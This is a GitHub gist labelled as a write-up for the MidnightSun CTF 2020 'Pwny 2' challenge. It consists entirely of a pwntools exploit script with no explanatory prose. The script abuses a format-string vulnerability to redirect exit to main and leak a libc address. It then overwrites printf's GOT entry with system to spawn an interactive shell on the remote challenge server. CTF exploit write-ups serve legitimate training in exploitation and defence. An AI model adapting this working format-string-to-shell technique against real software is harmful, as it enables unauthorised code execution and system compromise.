Skip to content

Instantly share code, notes, and snippets.

@SakiiR
Created Apr 5, 2020
Embed
What would you like to do?
MidnighSun CTF 2020 - Pwny 2 write up
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
context.terminal = ["tmux", "splitw", "-h"]
exe = context.binary = ELF("./challenge")
host = args.HOST or "pwn2-01.play.midnightsunctf.se"
port = int(args.PORT or 10002)
def local(argv=[], *a, **kw):
"""Execute the target binary locally"""
if args.GDB:
return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
else:
return process([exe.path] + argv, *a, **kw)
def remote(argv=[], *a, **kw):
"""Connect to the process on the remote host"""
io = connect(host, port)
if args.GDB:
gdb.attach(io, gdbscript=gdbscript)
return io
def start(argv=[], *a, **kw):
"""Start the exploit against the target."""
if args.LOCAL:
return local(argv, *a, **kw), ELF("/usr/lib32/libc.so.6")
else:
return remote(argv, *a, **kw), ELF("./libc.so.6")
gdbscript = """
b *0x08048688
continue
""".format(
**locals()
)
# -- Exploit goes here --
smain = 0x080485F5
def do(i):
io, libc = start()
log.info("exit @ 0x{:08x}".format(exe.got["exit"]))
writes = {exe.got["exit"]: smain}
payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
io.sendlineafter("input: ", payload)
payload = ""
payload += "%2$08x"
io.sendlineafter("input: ", payload)
_IO_2_1_stdin_ = int(io.recvline(), 16)
libc.address = _IO_2_1_stdin_ - libc.symbols["_IO_2_1_stdin_"]
binsh = libc.search("/bin/sh").next()
log.info("_IO_2_1_stdin_ @ 0x{:08x}".format(libc.symbols["_IO_2_1_stdin_"]))
log.info("Libc @ 0x{:08x}".format(libc.address))
log.info("system @ 0x{:08x}".format(libc.symbols["system"]))
log.info("/bin/sh @ 0x{:08x}".format(binsh))
writes = {exe.got["printf"]: libc.symbols["system"]}
payload = fmtstr_payload(7, writes, numbwritten=0, write_size="short")
print(payload)
io.sendlineafter("input: ", payload)
io.interactive()
def main():
do(1)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment